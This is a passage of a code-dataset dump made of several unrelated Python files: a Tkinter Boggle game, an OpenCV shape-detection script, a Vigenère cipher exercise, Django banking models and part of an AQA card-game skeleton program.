\"\\\n \"Words that include the letter 'q' without a following 'u' \"\\\n \"cannot be formed using this version of the game.\\n\\n\"\\\n \"This game is for educational purposes only.\"\n self.lab = tk.Label(\n self.intro, text=self.msg, anchor=tk.CENTER, justify=tk.LEFT,\n wraplength=300, font=(\"Arial\", 9, \"bold\"), fg=\"blue\",\n bg=\"darkslategray1\")\n self.lab.pack(side=\"top\", pady=50)\n self.button = tk.Button(\n self.intro, text=\"OK\", width=4, height=1,\n font=(\"Arial\", 10, \"bold\"), fg=\"blue\", command=self.intro.destroy)\n self.button.pack(side=\"top\")\n self.intro.focus_force()\n self.wait_window(self.intro)\n\n def createGameOptions(self):\n try:\n self.begin.destroy()\n except AttributeError:\n pass\n\n try:\n if self.options.winfo_exists():\n self.options.lift(aboveThis=self)\n return 0\n except AttributeError:\n pass\n\n self.options = tk.Toplevel(bg=\"darkslategray1\")\n self.options.geometry(\"{0}x{1}+{2}+{3}\".format(400, 325, 195, 150))\n self.options.wm_title(\"BOGGLE OPTIONS\")\n self.options.resizable(0, 0)\n self.options.lift(aboveThis=self)\n self.options.protocol(\"WM_DELETE_WINDOW\", self.__CancelCommand)\n\n self.result = True\n self.options.grid()\n self.options.top = tk.Frame(\n self.options, bg=\"darkslategray1\", width=400, height=75)\n self.options.top.grid(row=0, column=0)\n self.options.scale_label = tk.Label(\n self.options.top, text=\"Computer Guess Time (sec):\",\n font=(\"Arial\", 9, \"bold\"), fg=\"cyan\", bg=\"darkorchid3\")\n self.options.scale_label.place(relx=0.5, rely=0.3, anchor=tk.CENTER)\n self.options.scale = tk.Scale(\n self.options.top, from_=5, to=9, orient=tk.HORIZONTAL)\n self.options.scale.set(self.comp_guess_time)\n self.options.scale.place(relx=0.5, rely=0.75, anchor=tk.CENTER)\n\n self.options.bottom = tk.Frame(\n self.options, bg=\"darkslategray1\", width=400, height=250)\n self.options.bottom.grid(row=1, column=0)\n\n def sel():\n infile_dict = str(self.tmp_def.get())\n try:\n if self.options.sel_label.winfo_exists():\n self.options.sel_label.destroy()\n except AttributeError:\n pass\n\n try:\n if infile_dict != \"other\":\n self.path.destroy()\n except AttributeError:\n pass\n\n self.default_dict = infile_dict\n if infile_dict == \"other\":\n self.path = tk.Entry(\n self.options.bottom, width=20, font=(\"Arial\", 10))\n self.path.focus_set()\n self.path.place(relx=0.5, rely=0.7, anchor=tk.CENTER)\n\n selection = \"You selected the \" + infile_dict + \" dictionary.\"\n self.options.sel_label = tk.Label(\n self.options.bottom, anchor=tk.CENTER,\n font=(\"Arial\", 9, \"bold\"), fg=\"darkorchid3\", text=selection)\n self.options.sel_label.place(relx=0.5, rely=0.8, anchor=tk.CENTER)\n\n self.dict_label = tk.Label(\n self.options.bottom, text=\"Dictionary Choices:\",\n font=(\"Arial\", 9, \"bold\"), fg=\"cyan\", bg=\"darkorchid3\")\n self.dict_label.place(relx=0.5, rely=0.15, anchor=tk.N)\n\n self.tmp_def = tk.StringVar()\n if (self.default_dict == \"american-english\"\n or self.default_dict == \"british-english\"\n or self.default_dict == \"/usr/share/dict/words\"):\n self.tmp_def.set(self.default_dict)\n else:\n self.tmp_def.set(\"other\")\n self.path = tk.Entry(\n self.options.bottom, width=20, font=(\"Arial\", 10))\n self.path.place(relx=0.5, rely=0.7, anchor=tk.CENTER)\n self.path.insert(\"end\", self.default_dict)\n\n self.options.b1 = tk.Radiobutton(\n self.options.bottom, text=\"American-English\", bg=\"darkslategray1\",\n variable=self.tmp_def, value=\"american-english\", command=sel)\n self.options.b1.place(relx=0.5, 
rely=0.275, anchor=tk.CENTER)\n\n self.options.b2 = tk.Radiobutton(\n self.options.bottom, text=\"British-English\", bg=\"darkslategray1\",\n variable=self.tmp_def, value=\"british-english\", command=sel)\n self.options.b2.place(relx=0.5, rely=0.375, anchor=tk.CENTER)\n\n self.options.b4 = tk.Radiobutton(\n self.options.bottom, text=\"Other\", bg=\"darkslategray1\",\n variable=self.tmp_def, value=\"other\", command=sel)\n self.options.b4.place(relx=0.5, rely=0.575, anchor=tk.CENTER)\n\n if os.name == \"posix\":\n self.options.b3 = tk.Radiobutton(\n self.options.bottom, text=\"Linux Words\", bg=\"darkslategray1\",\n variable=self.tmp_def, value=\"/usr/share/dict/words\",\n command=sel)\n self.options.b3.place(relx=0.5, rely=0.475, anchor=tk.CENTER)\n\n self.options.done_button = tk.Button(\n self.options.bottom, text=\"DONE\", width=6, height=1,\n font=(\"Arial\", 10, \"bold\"), fg=\"cyan\",\n command=self.get_dictionary, bg=\"darkorchid3\")\n self.options.done_button.place(relx=0.5, rely=0.93, anchor=tk.CENTER)\n self.wait_window(self.options)\n\n def createGameSetup(self):\n self.game_setup = tk.Toplevel(bg=\"darkslategray1\")\n self.game_setup.geometry(\"{0}x{1}+{2}+{3}\".format(250, 65, 275, 175))\n self.game_setup.wm_title(\"BOGGLE SETUP\")\n self.game_setup.resizable(0, 0)\n self.game_setup.lift(aboveThis=self)\n self.game_setup.protocol(\"WM_DELETE_WINDOW\", self.__CancelCommand)\n self.info = tk.Label(\n self.game_setup, anchor=tk.CENTER,\n text=\"Setting up the game, please wait....\",\n font=(\"Arial\", 9, \"bold\"), fg=\"blue\", bg=\"darkslategray1\")\n self.info.pack(side=\"top\", pady=20)\n self.game_setup.after(\n 500, func=lambda: gamesetup.build_all_words(self))\n self.wait_window(self.game_setup)\n\n def createGameReady(self):\n self.begin = tk.Toplevel(bg=\"darkslategray1\")\n self.begin.geometry(\"{0}x{1}+{2}+{3}\".format(150, 75, 325, 300))\n self.begin.wm_title(\"READY\")\n self.begin.resizable(0, 0)\n self.begin.lift(aboveThis=self)\n self.begin.protocol(\"WM_DELETE_WINDOW\", self.__CancelCommand)\n self.begin.focus_force()\n self.start_button = tk.Button(self.begin, command=self.start_game)\n self.start_button.configure(\n text=\"Start\", font=(\"Arial\", 10, \"bold\"), bg=\"darkorchid3\",\n fg=\"cyan\", padx=50)\n self.start_button.pack(side=tk.TOP, pady=20)\n self.wait_window(self.begin)\n\n def createWinnerCircle(self):\n self.win_circ = tk.Toplevel(bg=\"darkslategray1\")\n self.win_circ.geometry(\"{0}x{1}+{2}+{3}\".format(260, 150, 275, 250))\n self.win_circ.resizable(0, 0)\n self.win_circ.lift(aboveThis=self)\n self.win_circ.focus_force()\n if self.human_player.score > self.comp_player.score:\n self.win_circ.wm_title(\"WINNER'S CIRCLE\")\n self.msg = \"CONGRATULATIONS! You are the master! \\n\\n Play again?\"\n else:\n self.win_circ.wm_title(\"LOSER'S CIRCLE\")\n self.msg = \"YOU LOSE! Sad face... 
\\n\\n Play again?\"\n self.win_info = tk.Label(\n self.win_circ, anchor=tk.CENTER, text=self.msg,\n font=(\"Arial\", 9, \"bold\"), fg=\"blue\", bg=\"darkslategray1\")\n self.win_info.place(relx=0.5, rely=0.2, anchor=tk.CENTER)\n self.play_yes = tk.Button(\n self.win_circ, command=self.reset_game, width=4, height=1)\n self.play_yes.configure(\n text=\"YES\", font=(\"Arial\", 9, \"bold\"), bg=\"darkorchid3\", fg=\"cyan\")\n self.play_yes.place(relx=0.35, rely=0.5, anchor=tk.CENTER)\n self.play_no = tk.Button(\n self.win_circ, command=self.close_game, width=4, height=1)\n self.play_no.configure(\n text=\"NO\", font=(\"Arial\", 9, \"bold\"), bg=\"darkorchid3\", fg=\"cyan\")\n self.play_no.place(relx=0.65, rely=0.5, anchor=tk.CENTER)\n self.config_msg = \"To reconfigure, close this window and select \"\\\n \"option to reconfigure from 'Configure' tab. When done, \"\\\n \"select new game from 'File' tab.\"\n self.win_reconfig = tk.Label(\n self.win_circ, anchor=tk.CENTER, text=self.config_msg,\n justify=tk.LEFT, wraplength=240, font=(\"Arial\", 7, \"bold\"),\n fg=\"firebrick1\", bg=\"darkslategray1\")\n self.win_reconfig.place(relx=0.5, rely=0.8, anchor=tk.CENTER)\n\n ##########################\n # #\n # GAME WIDGETS #\n # #\n ##########################\n\n def setupMenu(self):\n # Setting up the menu bar\n self.menubar = tk.Menu(self, bg=\"cyan\", fg=\"blue\")\n self.config(menu=self.menubar)\n\n self.filemenu = tk.Menu(self.menubar)\n self.filemenu.add_command(\n label=\"New Game\", command=self.reset_game, font=(\"Arial\", 8))\n self.filemenu.add_command(\n label=\"Quit Game\", command=self.close_game, font=(\"Arial\", 8))\n self.menubar.add_cascade(\n label=\"File\", menu=self.filemenu, font=(\"Arial\", 10, \"bold\"))\n\n self.editmenu = tk.Menu(self.menubar)\n self.editmenu.add_command(\n label=\"Change Time Interval\", command=self.createGameOptions,\n font=(\"Arial\", 8))\n self.editmenu.add_command(\n label=\"Change Dictionary\", command=self.createGameOptions,\n font=(\"Arial\", 8))\n self.menubar.add_cascade(\n label=\"Configure\", menu=self.editmenu, font=(\"Arial\", 10, \"bold\"))\n\n def setupLeftPane(self):\n # Add text box for guessed words\n self.guess_box = tk.Frame(self.left, height=50, width=50, bg=\"cyan\")\n scrollbar = tk.Scrollbar(self.guess_box)\n scrollbar.pack(side=tk.RIGHT, fill=tk.Y)\n self.label_box = tk.Label(\n self.guess_box, text=\"SOLVED WORDS:\", font=(\"Arial\", 8, \"bold\"),\n bg=\"cyan\", fg=\"blue\")\n self.label_box.pack(side=tk.TOP)\n self.guess_entry = tk.Text(\n self.guess_box, yscrollcommand=scrollbar.set,\n state=\"disabled\", width=25, height=25, font=(\"Arial\", 8))\n self.guess_entry.pack(side=tk.RIGHT)\n scrollbar.config(command=self.guess_entry.yview)\n self.guess_box.place(relx=0.5, rely=0.5, anchor=tk.CENTER)\n\n def setupMiddlePane(self):\n # Setting up the image display\n ##########################################################\n # #\n # The below boggle image was pulled from the below site, #\n # cropped down, and recolored to match my color pattern #\n # --> http://shop.tpet.co.uk/boggle-interactive-game #\n # #\n ##########################################################\n\n self.mainimg = tk.PhotoImage(file=\"gameimage.gif\")\n self.pic_label = tk.Label(\n self.middle, width=250, height=65, bg=\"steelblue1\",\n image=self.mainimg)\n self.pic_label.place(relx=0.5, rely=0.09, anchor=tk.CENTER)\n\n # Setting up the board display\n self.board_grid = tk.Frame(self.middle, height=390, width=390)\n self.buttons = []\n\n for pos in 
self.board.current_board:\n if pos.flag:\n b = tk.Button(\n self.board_grid, text=pos.letter,\n font=(\"Arial\", 12, \"bold\"), height=3, width=6, fg=\"red\",\n state=\"disabled\", bg=\"lavender\",\n command=lambda pos=pos: self.type_letter(pos))\n else:\n b = tk.Button(\n self.board_grid, text=pos.letter,\n font=(\"Arial\", 12, \"bold\"), height=3, width=6,\n fg=\"darkorchid3\", state=\"disabled\", bg=\"lavender\",\n command=lambda pos=pos: self.type_letter(pos))\n self.buttons.append((b, pos.flag))\n b.grid(row=pos.x_coord, column=pos.y_coord)\n\n self.board_grid.pack_propagate(0)\n self.board_grid.place(relx=0.5, rely=0.53, anchor=tk.CENTER)\n\n # Add text box for user to type in words\n self.word_box = tk.Frame(self.middle, height=500, width=500)\n self.label_box = tk.Label(\n self.word_box, text=\"Input Word:\", font=(\"Arial\", 10, \"bold\"),\n bg=\"cyan\", fg=\"blue\")\n self.label_box.pack(side=tk.LEFT)\n self.entry_box = tk.Entry(\n self.word_box, width=20, font=(\"Arial\", 10), state=\"disabled\")\n self.entry_box.pack(side=tk.RIGHT)\n self.textarea = tk.Text(self.entry_box, width=20, height=20)\n self.entry_box.bind(\"<Return>\", lambda x: self.get_word())\n self.word_box.place(relx=0.5, rely=0.93, anchor=tk.CENTER)\n\n def setupRightPane(self):\n # Add score box for human player\n self.h_score_box = tk.Frame(\n self.right, height=50, width=50, bg=\"cyan\")\n self.h_label = tk.Label(\n self.h_score_box, text=\"YOUR SCORE:\", font=(\"Arial\", 9, \"bold\"),\n bg=\"cyan\", fg=\"blue\")\n self.h_label.pack(side=tk.TOP)\n self.h_text = tk.Label(\n self.h_score_box, width=15, height=1,\n font=(\"Arial\", 9), textvariable=self.human_score, bg=\"white\")\n self.h_text.pack(side=tk.RIGHT)\n self.h_score_box.place(relx=0.5, rely=0.3, anchor=tk.CENTER)\n\n # Add score box for computer player\n self.c_score_box = tk.Frame(self.right, height=50, width=50, bg=\"cyan\")\n self.c_label = tk.Label(\n self.c_score_box, text=\"COMP SCORE:\", font=(\"Arial\", 9, \"bold\"),\n bg=\"cyan\", fg=\"blue\")\n self.c_label.pack(side=tk.TOP)\n self.c_text = tk.Label(\n self.c_score_box, width=15, height=1,\n font=(\"Arial\", 9), textvariable=self.comp_score, bg=\"white\")\n self.c_text.pack(side=tk.RIGHT)\n self.c_score_box.place(relx=0.5, rely=0.5, anchor=tk.CENTER)\n\n # Add clear button\n self.clear_button = tk.Button(\n self.right, text=\"CLEAR\", font=(\"Arial\", 10, \"bold\"),\n bg=\"darkorchid3\", fg=\"cyan\", height=2,\n width=6, state=\"disabled\", command=self.reset_buttons)\n self.clear_button.pack(side=tk.RIGHT)\n self.clear_button.place(relx=0.5, rely=0.7, anchor=tk.CENTER)\n\n # timer countdown display\n self.timer = tk.Frame(self.right, height=50, width=50, bg=\"cyan\")\n self.timer_label = tk.Label(\n self.timer, text=\"REMAINING TIME:\", font=(\"Arial\", 12, \"bold\"),\n bg=\"cyan\", fg=\"blue\")\n self.timer_label.pack(side=tk.TOP)\n self.time = tk.Label(\n self.timer, width=17, height=1,\n font=(\"Arial\", 12, \"bold\"), bg=\"white\")\n self.time.configure(textvariable=self.time_left)\n self.time.pack(side=tk.RIGHT)\n self.timer.place(relx=0.5, rely=0.9, anchor=tk.CENTER)\n\n def createWidgets(self):\n \"\"\"Creates the different pieces of the Application GUI\"\"\"\n\n self.setupMenu()\n self.setupLeftPane()\n self.setupMiddlePane()\n self.setupRightPane()\n\n\n# Game Loop\napp = Boggle(None)\napp.mainloop()\n","sub_path":"boggle.py","file_name":"boggle.py","file_ext":"py","file_size_in_byte":29055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"419201314","text":"import cv2\nimport cv2 as cv\nimport numpy as np\n##image stacking\ndef stackImages(scale, imgArray):\n rows = len(imgArray)\n cols = len(imgArray[0])\n rowsAvailable = isinstance(imgArray[0], list)\n width = imgArray[0][0].shape[1]\n height = imgArray[0][0].shape[0]\n if rowsAvailable:\n for x in range(0, rows):\n for y in range(0, cols):\n if imgArray[x][y].shape[:2] == imgArray[0][0].shape[:2]:\n imgArray[x][y] = cv.resize(imgArray[x][y], (0, 0), None, scale, scale)\n else:\n imgArray[x][y] = cv.resize(imgArray[x][y], (imgArray[0][0].shape[1], imgArray[0][0].shape[0]),\n None, scale, scale)\n if len(imgArray[x][y].shape) == 2: imgArray[x][y] = cv.cvtColor(imgArray[x][y], cv.COLOR_GRAY2BGR)\n imageBlank = np.zeros((height, width, 3), np.uint8)\n hor = [imageBlank] * rows\n hor_con = [imageBlank] * rows\n for x in range(0, rows):\n hor[x] = np.hstack(imgArray[x])\n ver = np.vstack(hor)\n else:\n for x in range(0, rows):\n if imgArray[x].shape[:2] == imgArray[0].shape[:2]:\n imgArray[x] = cv.resize(imgArray[x], (0, 0), None, scale, scale)\n else:\n imgArray[x] = cv.resize(imgArray[x], (imgArray[0].shape[1], imgArray[0].shape[0]), None, scale, scale)\n if len(imgArray[x].shape) == 2: imgArray[x] = cv.cvtColor(imgArray[x], cv.COLOR_GRAY2BGR)\n hor = np.hstack(imgArray)\n ver = hor\n return ver\npath = './images/shapes.png'\nimg = cv.imread(path)\n\nprint(img.shape)\n\ndef getcontour(img):\n contour,hierarchy=cv.findContours(img,cv.RETR_EXTERNAL,cv.CHAIN_APPROX_NONE)\n for cnt in contour:\n area=cv.contourArea(cnt) #####getting contour area\n\n if area>1000:\n cv.drawContours(imgcontour, cnt, -1, (255, 0, 0), 1)####drawing contours\n print(area)\n peri=cv.arcLength(cnt,True) ####getting perimeter\n print(peri)\n approx=cv.approxPolyDP(cnt,.02*peri,True) ####getting no. of corners\n print(len(approx))\n ####getting bounding box.\n objcor=len(approx)\n x, y, w, h =cv.boundingRect(approx)\n cv.rectangle(imgcontour,(x,y),(x+w,y+h),(0,0,0),3)\n\n #####identifying object according to corners\n if objcor ==3: objecttype=\"tri\"\n elif objcor==4:\n aspRatio = w / float(h)\n if aspRatio > 0.98 and aspRatio < 1.03:\n objecttype = \"Square\"\n else:\n objecttype = \"Rectangle\"\n\n else : objecttype=\"circle\"\n cv.putText(imgcontour,objecttype,(x+(w//2)-10,y+(h//2)-10),cv2.FONT_HERSHEY_COMPLEX,0.5,\n (0,0,0),2)\n\n\n\nimg = img[5:253,3:194]\nim_gray=cv.cvtColor(img,cv.COLOR_BGR2GRAY)\nim_blur=cv.GaussianBlur(im_gray,(3,5),0)\nim_canny=cv.Canny(im_gray,50,50)\nim_blank=np.zeros_like(img)\nimgcontour=img.copy()\ngetcontour(im_canny)\nimgstack=stackImages(0.9,([img,im_gray,im_blur,],[im_canny,imgcontour,im_blank]))\ncv.imshow(\"image\",imgstack)\n# cv.imshow(\"gray\",im_gray)\n# cv.imshow(\"blur\",im_blur)\ncv.waitKey(0)","sub_path":"ContourDetection/contour detection.py","file_name":"contour detection.py","file_ext":"py","file_size_in_byte":3250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"458207185","text":"from sys import argv, exit\n\n# checks if argument is valid\nif len(argv) != 2:\n exit(\"Usage: python vigenere.py k\")\nelif not argv[1].isalpha():\n exit(\"Usage: python vigenere.py k\")\n\n\nkeyWord = argv[1]\n# keyword values\nkeyNum = []\n\nfor i in keyWord:\n if i.isalpha() and i.isupper():\n keyNum.append(ord(i) - ord('A'))\n elif i.isalpha() and i.islower():\n keyNum.append(ord(i) - ord('a'))\n else:\n keyNum.append(ord(i))\n\n# gets plaintext\nplaintext = input(\"Plaintext: \")\n# counter to loop over the key word\nkeyCounter = 0\n#print ciphertext\nprint(\"ciphertext: \", end=\"\")\n\nfor i in plaintext:\n\n # Ciphertext\n ciphertext = ord(i) + keyNum[keyCounter]\n\n\n if i.isupper() and ciphertext > 90:\n ciphertext = ciphertext - 26\n elif i.islower() and ciphertext > 122:\n ciphertext = ciphertext - 26\n\n # deacrease counter if k not alpha\n elif not i.isalpha():\n ciphertext = ord(i)\n if keyCounter > 0:\n keyCounter -= 1\n else:\n keyCounter = 0\n\n\n # rest if the counter = keyNum\n if keyCounter == (len(keyNum) - 1):\n keyCounter = 0\n # in case not reach max\n else:\n keyCounter += 1\n\n # make it ciphertext\n print(chr(ciphertext), end=\"\")\n\nprint(\"\")","sub_path":"pset6/vigenere.py","file_name":"vigenere.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"149738554","text":"from django.db import models\nfrom django.core.validators import (\n MinValueValidator,\n MaxValueValidator,\n)\nimport uuid\n\n# Create your models here.\nclass Users(models.Model):\n\n id = models.UUIDField(\n primary_key=True, unique=True, editable=False,\n default=uuid.uuid4\n )\n\n first_name = models.CharField(max_length=30)\n last_name = models.CharField(max_length=30)\n\n username = models.CharField(\n max_length=30, unique=True, null=True, blank=True,\n help_text=(\n 'Required. 30 characters or fewer. Letters, digits and '\n 'Use special characters in case the given username is repeated'\n ))\n\n dob = models.DateField(blank=False, null=False)\n address = models.CharField(max_length=100)\n\n password = models.CharField(\n max_length=300, unique=False, null=True, blank=True,\n help_text=(\n 'Required. 30 characters or fewer. Letters, digits and '\n 'special characters'\n ))\n\n def __str__(self):\n return str(self.username)\n\nclass Account(models.Model):\n account_id = models.UUIDField(\n primary_key=True,\n editable=False,\n unique=True,\n default=uuid.uuid4\n )\n user = models.ForeignKey(\n Users, on_delete=models.CASCADE, related_name='accounts'\n )\n\n #using MinValueValidator and MaxValueValidator to validate account number to have 8 digits\n\n account_no = models.IntegerField(\n unique=True,\n validators=[\n MinValueValidator(10000000),\n MaxValueValidator(99999999)\n ],\n null=True, blank=True\n )\n\n #validating password to have special characters and upper and lower case letters and digits\n pin = models.CharField(\n max_length=6,\n unique=False, null=True, blank=True,\n help_text=(\n 'Required. 6 digits'\n ))\n\n balance = models.DecimalField(decimal_places=2, max_digits=15)\n\n def __str__(self):\n return str(self.account_no) + \" balance: \" + str(self.balance)\n\n\nclass AllTransactions(models.Model):\n time = models.DateTimeField(auto_now_add=True)\n\n account = models.ForeignKey(\n Account, on_delete=models.CASCADE, related_name=\"account\"\n )\n receiveracc = models.ForeignKey(\n Account, on_delete=models.CASCADE,\n null=True, blank=True, related_name=\"receiversacc\"\n )\n withdrawstatus = models.DecimalField(\n decimal_places=2, max_digits=15, null=True, blank=True\n )\n depositstatus = models.DecimalField(\n decimal_places=2, max_digits=15, null=True, blank=True\n )\n transferedMoney = models.DecimalField(\n decimal_places=2, max_digits=15, null=True, blank=True\n )\n","sub_path":"bankingapp/apps/netbankingapp/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"460675259","text":"\n\nfrom xai.brain.wordbase.nouns._contradiction import _CONTRADICTION\n\n#calss header\nclass _CONTRADICTIONS(_CONTRADICTION, ):\n\tdef __init__(self,): \n\t\t_CONTRADICTION.__init__(self)\n\t\tself.name = \"CONTRADICTIONS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"contradiction\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_contradictions.py","file_name":"_contradictions.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"50824473","text":"# Skeleton Program code for the AQA COMP1 Summer 2014 examination\r\n# this code should be used in conjunction with the Preliminary Material\r\n# written by the AQA Programmer Team\r\n# developed in the Python 3.2 programming environment\r\n# version 2 edited 06/03/2014\r\n\r\nimport random, datetime\r\n\r\nNO_OF_RECENT_SCORES = 3\r\n\r\nclass TCard():\r\n def __init__(self):\r\n self.Suit = 0\r\n self.Rank = 0\r\n\r\nclass TRecentScore():\r\n def __init__(self):\r\n self.Name = ''\r\n self.Score = 0\r\n self.Date = None\r\n\r\nDeck = [None]\r\nRecentScores = [None]\r\nChoice = ''\r\nAceHigh = False\r\n\r\ndef GetRank(RankNo):\r\n Rank = ''\r\n if RankNo == 1:\r\n Rank = 'Ace'\r\n elif RankNo == 2:\r\n Rank = 'Two'\r\n elif RankNo == 3:\r\n Rank = 'Three'\r\n elif RankNo == 4:\r\n Rank = 'Four'\r\n elif RankNo == 5:\r\n Rank = 'Five'\r\n elif RankNo == 6:\r\n Rank = 'Six'\r\n elif RankNo == 7:\r\n Rank = 'Seven'\r\n elif RankNo == 8:\r\n Rank = 'Eight'\r\n elif RankNo == 9:\r\n Rank = 'Nine'\r\n elif RankNo == 10:\r\n Rank = 'Ten'\r\n elif RankNo == 11:\r\n Rank = 'Jack'\r\n elif RankNo == 12:\r\n Rank = 'Queen'\r\n elif RankNo == 13:\r\n Rank = 'King'\r\n \r\n return Rank\r\n\r\ndef GetSuit(SuitNo):\r\n Suit = ''\r\n if SuitNo == 1:\r\n Suit = 'Clubs'\r\n elif SuitNo == 2:\r\n Suit = 'Diamonds'\r\n elif SuitNo == 3:\r\n Suit = 'Hearts'\r\n elif SuitNo == 4:\r\n Suit = 'Spades'\r\n return Suit\r\n\r\ndef DisplayMenu():\r\n print()\r\n print('MAIN MENU')\r\n print()\r\n print('1. Play game (with shuffle)')\r\n print('2. Play game (without shuffle)')\r\n print('3. Display recent scores')\r\n print('4. Reset recent scores')\r\n print('5. Options')\r\n print('6. Save high scores')\r\n print()\r\n print('Select an option from the menu (or enter q to quit): ', end='')\r\n\r\ndef GetMenuChoice():\r\n Choice = input()\r\n if Choice == \"Quit\" or Choice == \"Q\":\r\n Choice = \"q\"\r\n print()\r\n return Choice\r\n\r\ndef BubbleSortScores(RecentScores):\r\n Swapped = True\r\n while Swapped:\r\n Swapped = False\r\n for count in range(1, NO_OF_RECENT_SCORES):\r\n if RecentScores[count].Score < RecentScores[count+1].Score:\r\n temp = RecentScores[count]\r\n RecentScores[count] = RecentScores[count+1]\r\n RecentScores[count+1] = temp\r\n Swapped = True\r\n \r\n\r\ndef SaveScores(RecentScores):\r\n with open(\"save_scores.txt\",mode=\"w\",encoding=\"utf-8\") as my_file:\r\n for each in range(1,NO_OF_RECENT_SCORES+1):\r\n my_file.write(RecentScores[each].Name+\"\\n\")\r\n my_file.write(str(RecentScores[each].Score)+\"\\n\")\r\n my_file.write(str(RecentScores[each].Date)+\"\\n\")\r\n \r\ndef LoadScores():\r\n for count in range(2):\r\n try:\r\n with open(\"save_scores.txt\",mode=\"r\",encoding=\"utf-8\") as my_file:\r\n for line in range(1, NO_OF_RECENT_SCORES+1):\r\n RecentScores[line].Name = my_file.readline()\r\n RecentScores[line].Score = my_file.readline()\r\n RecentScores[line].Date = my_file.readline()\r\n except IOError:\r\n SaveScores(RecentScores)\r\n \r\n\r\ndef DisplayOptions():\r\n print(\"Options menu\")\r\n print()\r\n print(\"1. Set Ace to be HIGH or LOW\")\r\n print(\"2. 
Card of same score ends game.\")\r\n print()\r\n\r\ndef GetOptionChoice():\r\n OptionOne = False\r\n while not OptionOne:\r\n OptionChoice = input(\"Select an option from the menu (or enter Q to quit): \")\r\n if OptionChoice == \"1\" or \"Q\":\r\n OptionOne = True\r\n else:\r\n OptionOne = False\r\n OptionChoice = OptionChoice.lower()\r\n return OptionChoice\r\n\r\ndef SetOptions(OptionChoice):\r\n if OptionChoice == \"1\":\r\n AceHigh = SetAceHighOrLow()\r\n elif OptionChoice == \"2\":\r\n SetSameScore()\r\n\r\ndef SetAceHighOrLow():\r\n AceHigh = False\r\n HighLow = False\r\n while not HighLow:\r\n AceChoice = input(\"Do you want Ace to be (h)igh or (l)ow: \")\r\n if AceChoice == \"h\":\r\n AceHigh = True\r\n HighLow = True\r\n print(\"Ace has been set to HIGH\")\r\n elif AceChoice == \"l\":\r\n AceHigh = False\r\n HighLow = True\r\n return AceHigh\r\n\r\ndef SetSameScore():\r\n SameCard = False\r\n valid = False\r\n while not valid:\r\n SameCardChoice = input(\"If the next card is the same as the last, end game? (y or n): \")\r\n SameCardChoice = SameCardChoice.lower()\r\n if SameCardChoice == \"y\":\r\n SameCard = True\r\n valid = True\r\n elif SameCardChoice == \"n\":\r\n SameCard = False\r\n valid = True\r\n else:\r\n print(\"Please enter either \\\"Y\\\" or \\\"N\\\" \")\r\n valid = False\r\n\r\ndef LoadDeck(Deck):\r\n CurrentFile = open('deck.txt', 'r')\r\n Count = 1\r\n while True:\r\n LineFromFile = CurrentFile.readline()\r\n if not LineFromFile:\r\n CurrentFile.close()\r\n break\r\n Deck[Count].Suit = int(LineFromFile)\r\n LineFromFile = CurrentFile.readline()\r\n Deck[Count].Rank = int(LineFromFile)\r\n Count = Count + 1\r\n \r\ndef ShuffleDeck(Deck):\r\n SwapSpace = TCard()\r\n NoOfSwaps = 1000\r\n for NoOfSwapsMadeSoFar in range(1, NoOfSwaps + 1):\r\n Position1 = random.randint(1, 52)\r\n Position2 = random.randint(1, 52)\r\n SwapSpace.Rank = Deck[Position1].Rank\r\n SwapSpace.Suit = Deck[Position1].Suit\r\n Deck[Position1].Rank = Deck[Position2].Rank\r\n Deck[Position1].Suit = Deck[Position2].Suit\r\n Deck[Position2].Rank = SwapSpace.Rank\r\n Deck[Position2].Suit = SwapSpace.Suit\r\n\r\ndef DisplayCard(ThisCard):\r\n print()\r\n print('Card is the', GetRank(ThisCard.Rank), 'of', GetSuit(ThisCard.Suit))\r\n print()\r\n\r\ndef GetCard(ThisCard, Deck, NoOfCardsTurnedOver):\r\n ThisCard.Rank = Deck[1].Rank\r\n ThisCard.Suit = Deck[1].Suit\r\n for Count in range(1, 52 - NoOfCardsTurnedOver):\r\n Deck[Count].Rank = Deck[Count + 1].Rank\r\n Deck[Count].Suit = Deck[Count + 1].Suit\r\n Deck[52 - NoOfCardsTurnedOver].Suit = 0\r\n Deck[52 - NoOfCardsTurnedOver].Rank = 0\r\n\r\ndef IsNextCardHigher(LastCard, NextCard, AceHigh):\r\n Higher = False\r\n \r\n if AceHigh == False:\r\n if NextCard.Rank > LastCard.Rank:\r\n Higher = True\r\n\r\n elif AceHigh == True:\r\n if NextCard.Rank == 1 and LastCard.Rank != 1:\r\n Higher = True\r\n elif LastCard.Rank == 1:\r\n Higher = False\r\n elif NextCard.Rank > LastCard.Rank:\r\n Higher = True\r\n return Higher\r\n\r\ndef GetPlayerName():\r\n print()\r\n NameMan = False\r\n while not NameMan:\r\n PlayerName = input('Please enter your name: ')\r\n if PlayerName == \"\":\r\n print(\"You have to enter a name!\")\r\n else:\r\n if len(PlayerName) > 11:\r\n print(\"Sorry, that name is too long.\")\r\n else:\r\n NameMan = True\r\n print()\r\n return PlayerName\r\n\r\ndef GetChoiceFromUser():\r\n Choice = input('Do you think the next card will be higher than the last card (enter y or n)? 
